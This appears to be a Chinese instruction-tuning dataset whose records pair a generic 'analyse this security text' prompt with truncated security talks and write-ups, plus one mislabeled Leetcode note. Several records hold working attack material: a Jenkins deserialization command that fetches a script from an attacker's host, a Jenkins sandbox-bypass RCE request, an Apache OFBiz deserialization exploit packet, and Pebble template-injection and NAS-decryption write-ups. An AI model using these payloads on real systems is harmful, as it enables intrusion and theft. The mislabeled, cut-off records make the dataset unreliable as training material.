{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLocksport An Emerging Subculture Intro and History  Locks  Lockpickers Locks  Egyptian Pin Tumbler  Medieval Artistry  Puzzle Locks  Modern Advances  Pin Tumbler Sidebar  Wafer Lock  Disc Lock  Lever Lock Lockpickers  Pre-locks (the thief knot)  Wax pad attack  Similarity of keys  Brahma Vs. Hobbs  Great Exhibition  Unsupervised?  Still controversy  Media Coverage Modern Lockpicking  TOOOL NL  SSDEV (Germany)  The Dutch and German competitions  Coming to America (TOOOL US & LI)  DEFCON / HOPE The Open Organisation Of Lockpickers  Originated from the NVHS (Dutch Association for Door Hardware Sport )  Currently have several chapters and ~100 members.  Struggles with manufacturers  Developed relationships with many Lock firms:  Wink Haus  Assa Abloy  Geminy  RKS  Han Fey, lock collector  Dutch Open SSDEV  Steffan Wernery in 1997  First major established organization  Set out to provide a firm ethical foundation for the sport  Host competition in Berlin  Recently made the English language transition  Top pickers in the world  Over 1000 current members in ~ 10 chapters  Proposed a lockpicking olympics The German/Dutch Opens  1997 in Hamburg, DE  23 attempted in 1997  2002 in Sneek, NL  50 attempted in 2006  Prizes  2007 dates Coming To America!  TOOOL establishes first US chapter in 2002  Josh Nekrep, Kim Bohnet, and Devon McDormand form Locksport International in 2005  Eric Michaud, Babak Javadi, Eric Schmeidl, and Schuyler Towne form TOOOL US in 2006  TOOOL current membership  LI current membership  To merge or not to merge  Differences  Press DEFCON / HOPE  Con within a Con  LP Village  Other conferences that feature locksport  Developed from this community  Will always have common ties The Internet  Forums  YouTube  Blogs Forums  Lockpicking101.com  Black Hat  LI develops  Constant ethical debate  Division of material  EZPicking.com  Anti-LP101  No division of material  Limited talent  Bump Key Specific Forums  Limited info  Hopefully becoming obsolete YouTube  Lockp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Leetcode 题解 - 动态规划 <!-- GFM-TOC --> * [Leetcode 题解 - 动态规划](#leetcode-题解---动态规划) * [斐波那契数列](#斐波那契数列) * [1. 爬楼梯](#1-爬楼梯) * [2. 强盗抢劫](#2-强盗抢劫) * [3. 强盗在环形街区抢劫](#3-强盗在环形街区抢劫) * [4. 信件错排](#4-信件错排) * [5. 母牛生产](#5-母牛生产) * [矩阵路径](#矩阵路径) * [1. 矩阵的最小路径和](#1-矩阵的最小路径和) * [2. 矩阵的总路径数](#2-矩阵的总路径数) * [数组区间](#数组区间) * [1. 数组区间和](#1-数组区间和) * [2. 数组中等差递增子区间的个数](#2-数组中等差递增子区间的个数) * [分割整数](#分割整数) * [1. 分割整数的最大乘积](#1-分割整数的最大乘积) * [2. 按平方数来分割整数](#2-按平方数来分割整数) * [3. 分割整数构成字母字符串](#3-分割整数构成字母字符串) * [最长递增子序列](#最长递增子序列) * [1. 最长递增子序列](#1-最长递增子序列) * [2. 一组整数对能够构成的最长链](#2-一组整数对能够构成的最长链) * [3. 最长摆动子序列](#3-最长摆动子序列) * [最长公共子序列](#最长公共子序列) * [1. 最长公共子序列](#1-最长公共子序列) * [0-1 背包](#0-1-背包) * [1. 划分数组为和相等的两部分](#1-划分数组为和相等的两部分) * [2. 改变一组数的正负号使得它们的和为一给定数](#2-改变一组数的正负号使得它们的和为一给定数) * [3. 01 字符构成最多的字符串](#3-01-字符构成最多的字符串) * [4. 找零钱的最少硬币数](#4-找零钱的最少硬币数) * [5. 找零钱的硬币数组合](#5-找零钱的硬币数组合) * [6. 字符串按单词列表分割](#6-字符串按单词列表分割) * [7. 组合总和](#7-组合总和) * [股票交易](#股票交易) * [1. 需要冷却期的股票交易](#1-需要冷却期的股票交易) * [2. 需要交易费用的股票交易](#2-需要交易费用的股票交易) * [3. 只能进行两次的股票交易](#3-只能进行两次的股票交易) * [4. 只能进行 k 次的股票交易](#4-只能进行-k-次的股票交易) * [字符串编辑](#字符串编辑) * [1. 删除两个字符串的字符使它们相等](#1-删除两个字符串的字符使它们相等) * [2. 编辑距离](#2-编辑距离) * [3. 复制粘贴字符](#3-复制粘贴字符) <!-- GFM-TOC --> 递归和动态规划都是将原问题拆成多个子问题然后求解他们之间最本质的区别是动态规划保存了子问题的解避免重复计算 ## 斐波那契数列 ### 1. 爬楼梯 70\\. Climbing Stairs (Easy) [Leetcode](https://leetcode.com/problems/climbing-stairs/description/) / [力扣](https://leetcode-cn.com/problems/climbing-stairs/description/) 题目描述有 N 阶楼梯每次可以上一阶或者两阶求有多少种上楼梯的方法 定义一个数组 dp 存储上楼梯的方法数为了方便讨论数组下标从 1 开始dp[i] 表示走到第 i 个楼梯的方法数目 第 i 个楼梯可以从第 i-1 和 i-2 个楼梯再走一步到达走到第 i 个楼梯的方法数为走到第 i-1 和第 i-2 个楼梯的方法数之和 <!--<div align=\"center\"><img src=\"https://latex.codecogs.com/gif.latex?dp[i]=dp[i-1]+dp[i-2]\" class=\"mathjax-pic\"/></div> <br>--> <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/14fe1e71-8518-458f-a220-116003061a83.png\" width=\"200px\"> </div><br> 考虑到 dp[i] 只与 dp[i - 1] 和 dp[i - 2] 有关因此可以只用两个变量来存储 dp[i - 1] 和 dp[i - 2]使得原来的 O(N) 空间复杂度优化为 O(1) 复杂度 ```java public in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n甲方威胁情报杂谈 分享嘉宾 阿里里安全 王伟 alert7 Who am I?  Aka alert7 ,Xfocus核心成员  曾McAfee高级研究员  原翰海海源 联合创始人&技术总监  微博 _alert7_  阿里里安全归零实验室 功夫 议程 甲方威胁情报的尴尬 甲方情报能力力成熟度模型 传统情报体系 情报的一些特性 把威胁情报卖给甲方 甲方威胁情报的尴尬-现状的尴尬 2015年年圈内戏称威胁情报元年年各大 甲方公司纷纷建立威胁情报团队 2017年年年年尾听说好多甲方威胁 情报团队解散 价值衡量量的尴尬 正向业务挣钱的 负向业务花钱的 销售额/ 利利润 装机量量/ 用户数 建立优势 内部保障 风险解决 内需 快速变化风险与能力力产品的尴尬 假如有颗产品的心一开始不不知道如何用产品来做等你知道了了风险开始变小了了 已 经花了了20%的代价把80%的风险都干掉了了风险小了了还要继续产品打造吗 假如快速响应风险人工运营效率在哪里里能力力沉淀在哪里里长远的路路在哪里里 如何平衡 风险 产品 位置的尴尬  工作部分重叠  是否有核心竞争力力 业务团队1 业务团队2 业务团队3 情报团队 定位的尴尬 保镖 商业化 定位 愿景 战略略/打法 项目/抓手 议程 甲方威胁情报的尴尬 甲方情报能力力成熟度模型 传统情报体系 情报的一些特性 把威胁情报卖给甲方 传统威胁情报的成熟度 情报能力力的成熟度 预测 溯源调查 源头识别 影响评估 识别事件确认线索 成熟度传统威胁情报 VS 情报能力力 正向安全与反向安全 正向安全 反向安全 SDL 安全管理理 规范 安全测试 杀病毒 IDS/IPS 反APT产 品 防火墙 漏漏扫 反向安全的终极问题  能否发现攻击和风险 能否快速止血 能否评估影响范围 能否知道是谁人资产等意图是什什么能否预测下一步 他想做啥 检测识别 源头识别 评估影响 快速止血 溯源调查 人资产 手法产业 链 预测 看清大盘 事件 情报线索 甲方要的是真正的情报能力力 议程 甲方威胁情报的尴尬 甲方情报能力力成熟度模型 传统情报体系 情报的一些特性 把威胁情报卖给甲方 情报学 萨尔基斯 情报有机密 性 汉德尔情 报具备对抗 性反情报 也是情报的 组成部分 情报是对组织至关重要 的知识 情报是一种生产知识的 组织 情报是组织追求知识的 活动 情报是支撑行行动和决策 的知识 情报是帮助组织获得竞 争优势的 情报可以降低冲突的不不 确定性 谢尔曼-肯特  作为名称情报是知识  作为动词情报基本活动分为收集分析反情报  情报=信息+分析结果  情报分析本质上是一场智力力的游戏  情报本质是用来降低不不确定性的 传统情报工作的要素 情报收集 情报分析 反情报 人 力力 情 报 公 开 信 息 技 术 情 报 翻 译 解 密 关 联 推 导 反 谍 电 子 干 扰 保 密 & 加 密 假 情 报 隐蔽行行动 暴暴 力力 支 援 影 响 声学情报 红外情报 激光情报 核情报 光学情报 雷雷达情报 地理理空间 情报 互联网深 度情报 情报生成的过程 数据 信息 知识 智力力 认 知 判 断 收 集 行行动/决策 分 发 流 转 序 化 破 译 评 估 反 馈 博 大 精 深 反情报  反情报是情报对抗的升级 齐柏 林林计 划 北北方 坚忍 计划 南方 坚忍 计划 水银 计划 霸王计划 诺曼底登陆 加莱 罗匈从法 国抽4个师 挪威瑞典 牵制13个师 微光 计划 牵制第15军 APT中的反情报 DUQU 2.0 嫁祸目标 Ugly.gorilla APT1 Camellia APT1 Romanian.antihacker 罗马尼亚 LZJB 算法 MiniDuke木马 黄牛对抗的反情报 反跟踪反调试 举报同行行 情报收集-看NSA的天罗地网 棱镜 主干道 码头 核子 TAO 从线下的情报能力力到线上的情报能力力 从点的情报能力力到网的情报能力力 一体化的情报收集到情报行行动能力力 情报收集-看NSA的天罗地网 通讯基本靠吼 交通基本靠毛驴 情报分析-川普24小时夺旗战 跟纽约博物馆合作 好莱坞演员 Shia LaBeouf 新墨墨西哥州的一个剧院外 秘密据点 anti-trump新项目HE WILL NOT DIVIDE US 情报分析-川普24小时夺旗战 匿匿名论坛4chan 支持川普 技术宅者如何能忍 2 日落时间+天气变化 1 看风力力和实时气象风力力初步判断是五大 湖区域百公里里级别 3 社交网络情报 - 餐馆在美国田纳西州 的Greeneville. 城市级别 情报分析-川普24小时夺旗战 4 飞机-三角定位10公里里级别 5 汽车按喇喇叭 情报分析-川普24小时夺旗战 6 星轨 1公里里级别 情报分析-川普24小时夺旗战 7 Bin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jenkins Common Bugs ## Introduction What would you do if you came across a website that uses Jenkins? ## How to Detect Usually in the HTTP response there is a header like this `X-Jenkins` 1. Find the related CVE by checking jenkins version * How to find the jenkins version By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins) Some example CVE: - Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload. Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py): ```bash java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out ``` - Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable: ```bash curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a ``` Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc). - CheckScript RCE in Jenkins (CVE-2019-1003030) How to Exploit: - [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html) ``` GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ \"ping -c 1 xx.xx.xx.xx\".execute() } } HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAre all BSDs created equally? A survey of BSD kernel vulnerabili9es.; ! ! ! Ilja!van!Sprundel!<ivansprundel@ioac4ve.com>! Who Am I;  Ilja!van!Sprundel!!  ivansprundel@ioac4ve.com!  Director!of!Penetra4on!Tes4ng!at!IOAc4ve!!  Pen!test!  Code!review!  Break!stuff!for!fun!and!profit!J!! Outline/Agenda ;  Intro!  Data!!  vulnerabili4es!over!the!years!  Test!by!audit!  Common!aJack!surface!!  Somewhat!less!common!aJack!surface!!  Some!results!/!conclusions!! What is this talk about? ;  BSD!kernel!vulnerabili4es!!  Comparison!!  Between!different!BSD!flavors!!  Audience!!  Low!level!security!enthusiasts!!  UNIX/BSD!geeks!!  I!suspect!Linux!folks!might!enjoy!this!too!!  Curious!people!that!like!to!poke!around!in!OS!internals!  Knowledge!!  Some!basic!knowledge!of!UNIX!/!BSD!internals!!! Standing on the shoulders of giants;  Previous!interes4ng!BSD!kernel!security! research!by:!!  Silvio!!  the!noir!  Esa!Etelavuori!  Patroklos!(argp)!Argyroudis!  Christer!Oberg!!  Joel!Erikkson!!  Clement!Lecigne! intro; Really? Got Data?;  Somehow!that!statement!has!always! been!stuck!in!my!head!!  Is!it!true?!!  Can!we!look!at!some!data!?!! Source: hFps://www.cvedetails.com/product/47/Linux-Linux-Kernel.html; Data! ;  Goes!from!current!back!to!1999!for!Linux!kernel!vulnerabili4es!!  Cvedetails.com!doesnt!seem!to!provide!data!for!OBSD/NBSD/FBSD!!  Manually!grab!it!from!!  hJps://www.freebsd.org/security/advisories.html!  hJp://netbsd.org/support/security/advisory.html!  hJps://www.openbsd.org/errata*.html! BSD kernel vulnerabili9es over the years ;  Looking!at!these!numbers,!that!was!an!astute! observa4on!by!Theo.!!  20!was!a!very!low!es4mate!!  But!are!these!numbers!on!equal!foo4ng?!!  Many!eyeballs?!!  Yea,!yea,!I!know!.!But!is!there!some!truth!to!it!in!this! case?!!! FreeBSD! NetBSD! OpenBSD! 1999! 3! 8!XXXTODO! 2000! 8! 4!XXXTODO! 2001! 6! 7!XXXTODO! 2002! 11! 6!XXXTODO! 2003! 7! 3!XXXTODO! 2004! 8! 5!XXXTODO! 2005! 11! 8!XXXTODO! 2006! 9! 15!XXXTODO! 2007! 1! 4!XXXTODO! 2008! 8! 6!XXXTOD", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n起因 昨天在微信群看到个链接 搜了下发现是铁威马的NAS文章没写解密过程今天闲来无事就分析了下 0x00 简析结构 铁威马的NAS系统的UI使用PHP开发且文件为加密状态解压打开后发现加载了 php_terra_master.so 文件丢到 IDA 里发现是魔改的 phpscrew 加密 网上找了几篇解密的文章发现都不成功怀疑密钥被更改 0X01 找密钥 由于 phpscrew 魔改版会把 md5 加密后的秘钥的前16位写入被加密的文件所以对历史版本的PHP文 件和新的文件进行对比对比后发现密钥确实被修改 然后下载了历史版本 4.1.27 和 4.2.28 的版本发现关键库文件被修改过 用 Bindiff 打开这两个文件发现新版的文件添加了几个函数 进一步分析发现TOS为了兼容老版本将老版本的加密算法移入了 oldyek 函数 新版的算法改为用 yek 函数从 CAONIM 这个对国人亲切且友好的问候的字符串中取特定位组合为密钥 的方式 其中 CAONIM 字符串为硬编码的 It's0not2easy3to4develop6software,5please7don't9crack8it6please9keep7it3secretIt' s0not2easy3to4develop6software,5please7don't9crack8it6please9keep7it3secret 简单撸了个 python 算了下密钥 tos_str=\"It's0not2easy3to4develop6software,5please7don't9crack8it6please9keep7it3s ecretIt's0not2easy3to4develop6software,5please7don't9crack8it6please9keep7it3secre t\" \"\"\" __int64 __fastcall yek(__int64 a1) { __int64 result; // rax char v2; // cl for ( result = 0LL; result != 32; ++result ) { if ( (result & 1) != 0 ) v2 = CAONIM[2 * result]; else v2 = CAONIM[result]; *(_BYTE *)(a1 + result) = v2; } return result; } I''o0aot2eaoyota45eaedot6aoitlae \"\"\" final=\"\" 得到密钥 I''o0aot2eaoyota45eaedot6aoitlae 找个在线加密的站加密这个字符串后取前16位发现 确实为新的密钥 for i in range(32): if i&1 !=0: key_str=tos_str[2*i] else: key_str=tos_str[i] final=final+key_str print(final) 0x02 解密 有了密钥后在网上检索了下前人的痕迹发现老外写过解密脚本 https://gist.github.com/thatsn0tmysite/c20602289d2cdc9ab7484851eefd92ba 替换密钥进行测试解密 随后对整个网站进行解密后就可以分析了 参考链接 1. https://github.com//del-xiong/screw-plus 2. http://xibai.xyz/2022/02/24/%E9%93%81%E5%A8%81%E9%A9%ACF2-420-4-1-27%E5%9B%BA%E4%B B%B6%E9%80%86%E5%90%91%E5%88%86%E6%9E%90/ 3. https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ 4. https://gist.github.com/thatsn0tmysite/c20602289d2cdc9ab7484851eefd92ba 5. https://mp.weixin.qq.com/s/RQAbJS9tv7569zOBczqI8g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496 Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级跨平台跨数据库跨应用服务器的多层分布式电子商务类WEB应用系统的框架 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等 其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞攻击者利用这个漏洞可以在目标服务器上执行任意命令 参考链接 - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz - https://github.com/dwisiswant0/CVE-2020-9496 - https://www.cnblogs.com/ph4nt0mer/p/13576739.html ## 漏洞环境 执行如下命令启动一个Apache OfBiz 17.12.01版本 ``` docker compose up -d ``` 在等待数分钟后访问`https://your-ip/myportal/control/main`查看到登录页面说明环境已启动成功 ## 漏洞复现 由于默认情况下没有报错信息所以使用[参考连接2](https://github.com/dwisiswant0/CVE-2020-9496)中给出的方法无法正确判断漏洞是否存在还是需要通过执行反序列化来复现漏洞 使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload ``` java -jar ysoserial.jar CommonsBeanutils1 \"touch /tmp/success\" | base64 | tr -d \"\\n\" ``` ![](1.png) 将base64后的payload替换并发送如下数据包 ``` POST /webtools/control/xmlrpc HTTP/1.1 Host: your-ip Content-Type: application/xml Content-Length: 4093 <?xml version=\"1.0\"?> <methodCall> <methodName>ProjectDiscovery</methodName> <params> <param> <value> <struct> <member> <name>test</name> <value> <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">[base64-payload]</serializable> </value> </member> </struct> </value> </param> </params> </methodCall> ``` ![](2.png) 进入容器中可见`touch /tmp/success`已成功执行 ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduce LLVM from a hacker's view. Loda chou. hlchou@mail2000.com.tw 2012/07/02 1  I am Loda.  Work for 豬屎屋 (DeSign House).  Be familiar for MS-Windows System and Android/Linux Kernel.  Sometimesalso do some software crack job.  Like to dig-in new technology and share technical articles to promote to the public.  Motto  The way of a fool seems right to him ,but a wise man listens to advice. (Proverbs 12:15) Who am I? 2  Created by Vikram Adve and Chris Lattne on 2000  Support different front-end compilers (gcc/clang/....) and different languages (C/C++,Object-C,Fortran,Java ByteCode,Python,ActionScript) to generate BitCode.  The core of LLVM is the intermediate representation (IR). Different front-ends would compile source code to SSA-based IR, and traslate the IR into different native code on different platform.  Provide RISC-like instructions (load/storeetc), unlimited registers, exception (setjmp/longjmp)..etc  Provide LLVM Interpreter and LLVM Compiler to run LLVM application. What is LLVM? 3 Let's enjoy it. 4 Android Dalvik RunTime Dalvik ByteCode Framework in JAR Dalvik ByteCode AP in dex/odex Partial Dalvik AP implemented in Native .so Linux Kernel Java Native Interface Native .so library Dalvik Virtual Machine 5  Per-Process per-VM  JDK will compile Java to Suns bytecode, Android would use dx to convert Java bytecode to Dalvik bytecode.  Support Portable Interpreter (in C), Fast Interpreter (in Assembly) and Just-In Time Compiler  Just-In-Time Compiler is Trace-Run based.  By Counter to find the hot-zone  Would translate Dalvik bytecode to ARMv32/NEON/Thumb/Thumb2/..etc CPU instructions. The features of Dalvik VM 6 LLVM Interpreter RunTime Native .so library Linux Kernel Running by LLI (Low Level Virtual Machine Interpreter & Dynamic Compiler) LLVM BitCode AP 7  Could run llvm-application as the performance of native application  Could generate small size BitCode, translate to target platform assembly code then compiled into native execution file (final si", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022UIUCTF-Spoink(pebble最新模板注) 写在前 之前周末忙着强杯对这道题只做了半就搁置下来了最后卡在绕过最新pebble模板引擎 RCE那今天抽空来继续进剩下的分析正好题有个在现实场景当中能的trick顺 便也分享了 题环境分析 也是挺不错题直接给了docker环境便于本地搭建同时设置了权限需要执./getflag才能获 取获得flag FROM openjdk:18-slim-bullseye RUN mkdir /usr/src/app WORKDIR /usr/src/app # create user RUN groupadd chalusr RUN useradd -ms /bin/bash -g chalusr chalusr COPY spoink/target/spoink-0.0.1-SNAPSHOT-spring-boot.jar ./ COPY spoink/public ./public COPY spoink/templates ./templates COPY getflag ./ RUN chmod 111 ./getflag USER chalusr 路由只有个根据参数x返回指定模板刚看到这的时候其实有点懵毕竟很少见到只给 个路由的代码 不过我很快关注到了个application.properties当中个很有趣的点也就是这没有后缀因 此想到了个录穿越的可能 正 录穿越 CMD [\"java\", \"-jar\", \"/usr/src/app/spoink-0.0.1-SNAPSHOT-spring-boot.jar\"] @Controller public class HomeController { public HomeController() { } @RequestMapping({\"/\"}) public String getTemplate(@RequestParam(\"x\") Optional<String> template, Model model) { return (String)template.orElse(\"home.pebble\"); } } pebble.prefix = templates pebble.suffix = 为什么我说上那个点很有趣其实就是第个想分享的trick路径穿越简单来说pebble当 中有两个loader个是classpathloader另个是fileloader优先会在classpath下尝试加载模板 件如果寻找不到则使fileloader尝试加载模板件其他调栈不是很重要这就不多提 了 既然想实现任意件读那第个就别想了我们来看第个它在 com.mitchellbosecke.pebble.loader.FileLoader#getFile最终加载模板件内容 可以很明显看到这没有做路径限制导致我们可以进跨录读任意件 结果如下 RCE攻击路径初步构建 因此我们便能成功想到条能RCE的攻击路径 1. 上传带恶意内容的模板件到标服务器 2. 利LFI读取这个模板并RCE 如何上传件上传了如何获取 但是这就遇到第个难点如何上传件这路由当中并没有上传件的功能点 怎么办其实很简单我们也知道我们的Spring MVC框架是围绕DispatcherServlet来设计 的这个Servlet会把请求分发给各个处理器并持可配置的处理器映射视图渲染本地 化时区与主题渲染和 件上传 等功能好了我都圈出来重点了 在这过程当中它会检查这是否是个表单请求 正好我们也知道spring默认使内置的tomcat引擎 在处理表单的内容当中这会调 org.apache.catalina.connector.Request#getParts 去处理解析内容这在之前的章Tomcat件上传流量层系列章当中也提到过遗忘 的可以去我的博客考古 废话不多说类似php的处理样它会先将上传的件保存到个临时录再最终复制到 标件夹临时件夹的获取在哪 在 org.apache.catalina.connector.Request#parseParts 发现是通过 javax.servlet.MultipartConfigElement#getLocation 函数获取到保存到 临时路径 不难看到这是空对吧也就是默认值(默认的话后会存到/tmp录下)顺便多提下哪 可以设置这个location呢 在spring的启动过程当中会根据 spring.servlet.multipart.location 的值设置这个内 容具体可以去参考org.springframework.boot.autoconfigure.web.servlet.MultipartProperties @Configu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRelatively Easy to Exploit  Easily Automated  Usually not Monitored     Kerberos  Kerberos Delegation   Focus on High Privileges  Malicious JIT Administration     Ticket based authentication protocol Domain User AS TGS KDC LSASS (KERBEROS) ST TGT App Server TGT ST   Why?  An application reusing user credentials  Web server accessing a SQL DB  How?  Request tickets on behalf of the user User1 Web Server SQL Server DC User1 Authentication User1 Ticket Delegated    Delegation to any service   Kerberos Only (S4U2Proxy)  Protocol Transition (S4U2Self + S4U2Proxy) Domain Account or Local System Access NO ACCESS PIVOTING PRIVILEGED PERSISTENCE ACLs CONSTRAINED DELEGATION GPO TAMPERING BUSTED! Pass-The-Hash Pass-The-Ticket BloodHound GoFetch Domain Admin Enterprise Admin Dump NTDS.dit (VSS, DRSUAPI) Detect replication requests from a non-DC machine Golden ticket Detect crafted tickets Skeleton key (or others backdoors) Encryption downgrade   Accounts holding permanent high privileges serve as valuable targets for attackers  JIT Administration  High privileges are required to perform an operation  Get the required privileges for a limited amount of time  When the time period expires, the high privileges are revoked  Reduces the attack surface   Get administrative access for a limited time  Perform malicious operations  Leave no traces behind to avoid detection   Delegation scenario  AdminSDHolder scenario 1  AdminSDHolder scenario 2   Discretionary Access Control List (DACL)  Access control entry (ACE)  Object Ownership DACL User SID Security Group SIDs User Rights Access Token Deny ACEs Allow ACEs Inherited Deny ACEs Inherited Allow ACEs LSA Matches SIDs from The access Token with SIDs in the ACEs   Add a new machine account  Set machine owner to a malicious account  Owner can edit the ACL of the object   GPO Tampering: Enable accounts to be trusted for delegation   DACL Modification:  Add GenericAll ACE for malicious_user on new machine   Allow delegation to krbtgt  Reques", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNSM 101 for ICS About me Chris Sistrunk, PE Electrical Engineer Sr. ICS Security Consultant  Control system security assessments  ICS Village (DEF CON & RSA Conference) Entergy (11+ years)  SCADA Engineer (10 years)  Project Robus (ICS Protocol Fuzzing)  30+ implementation vulnerabilities in DNP3 stacks  Substation Security Team BSidesJackson What happens when you use nmap or a fuzzer on an ICS? If ICS are so vulnerable, why havent we seen more attacks? We arent looking! Two Key Reasons Intent Visibility Intent Very little ICS targeted attack data Maroochy Shire to Stuxnet to German Steel Plant Why are targeted attacks different? Its a Who not a What Professional, organized, well-funded If you kick them out, they will return Visibility Visibility Public ICS Vulnerabilities Per Year If your ICS gets hacked gadgets water electricity you cant make anymore Now what? More Govt security regulations ICS security still lagging Breaches are inevitable Attacks arent stopping Every sector Including ICS What can we do to get ahead of this??? Network Security Monitoring The collection, analysis, and escalation of indications and warnings to detect and respond to intrusions. NSM is a way to find intruders on your network and do something about them before they damage your enterprise. - The Practice of Network Security Monitoring Network Security Monitoring Invented in 1990, still in use today Cliff Stoll Stalking the Wily Hacker 1988 Todd Herberlein et al. A Network Security Monitor 1990 US Air Force Defense Information Systems Agency Lawrence Livermore National Lab Early 1990s NetRanger RealSecure Snort and many others Late 1990s - early 2000s Formal definition of NSM 2002 Before we start looking We need At least one person (to watch and hunt) The right tools to collect and analyze the data The NSM Cycle Collection Detection Analysis Model for action, based on network-derived data Requires people and process, not just technology Focuses on the adversary, not the vulnerability Me", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n数据安全杂谈 本发表于赛博回忆录 前 随着数据安全提上安全的常家其实可以发现传统的那种堆叠安全设备的防护式是个低效 的不太实的种防护段 所以防护的重发了偏移 个公司的安全建设随着防护的重发偏移从导致安全建设的中也发了偏移 痛 其实个企业在做企业级的安全建设的时候都会存在些相应的痛点问题这些痛点的解决随时随 地都牵涉着个安全团队的安全建设的进度 这样单独总结出来家可能觉得这并不是痛点啊下我就解释下这些痛点 1资源有限 预防性的安全建设资源有限 已经建设的业务投资源有限 已经发布的产品线 资源有限 时间不够 能不 没有负责的业务 2时间不够 业务都完成不了为什么要sdl修漏洞 3能不 缺少安全设计能和优秀的开发员 安全解决案五花没有统的安全架构设计 过多的安全投会影响业务或者安全度过会根本上影响业务 这个或许就是个甲的安全建设过程中临的很多问题那么在这么多的问题下现在的多数甲 的安全模式是什么呢 安全模式 近年其实攻防的热度常催了批很多攻防能极致的程师们当然在个如果有极 致的能并不是不好的证明个的在某个领域的专注程度但是从些我们也可以了解 到现在的多数的安全其实就在这种攻防的体制下进安全建设的流量监控志审计等等设备 攻防模式 攻防模式其实是种消防员的救模式哪有出现灾就去把灭个庞业务体量的安全甲 哪出现了个靶标就去把那个漏洞修掉这种模式有个有利的地是效果很直接感官上很明 显今天发现个危明天打了个补丁但是这种期救的模式会让个安全部陷期的 持久战中有的乐此不疲有的已经身疲惫尤其是红队和蓝队在久的拉锯战中内卷分 严重 事后救型模式 说到底就是渗透测试等这些安全防护的段永远都是在做个事后救的操作可能其中挖掘漏洞的 成果还局限在渗透测试程师的经验和能上所以我们的解决法是什么", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level18 #### About Analyse the C program, and look for vulnerabilities in the program. There is an easy way to solve this level, an intermediate way to solve it, and a more difficult/unreliable way to solve it. To do this level, log in as the level18 account with the password level18. Files for this level can be found in /home/flag18. #### Source code ``` #include <stdlib.h> #include <unistd.h> #include <string.h> #include <stdio.h> #include <sys/types.h> #include <fcntl.h> #include <getopt.h> struct { FILE *debugfile; int verbose; int loggedin; } globals; #define dprintf(...) if(globals.debugfile) \\ fprintf(globals.debugfile, __VA_ARGS__) #define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) \\ fprintf(globals.debugfile, __VA_ARGS__) #define PWFILE \"/home/flag18/password\" void login(char *pw) { FILE *fp; fp = fopen(PWFILE, \"r\"); if(fp) { char file[64]; if(fgets(file, sizeof(file) - 1, fp) == NULL) { dprintf(\"Unable to read password file %s\\n\", PWFILE); return; } fclose(fp); if(strcmp(pw, file) != 0) return; } dprintf(\"logged in successfully (with%s password file)\\n\", fp == NULL ? \"out\" : \"\"); globals.loggedin = 1; } void notsupported(char *what) { char *buffer = NULL; asprintf(&buffer, \"--> [%s] is unsupported at this current time.\\n\", what); dprintf(what); free(buffer); } void setuser(char *user) { char msg[128]; sprintf(msg, \"unable to set user to '%s' -- not supported.\\n\", user); printf(\"%s\\n\", 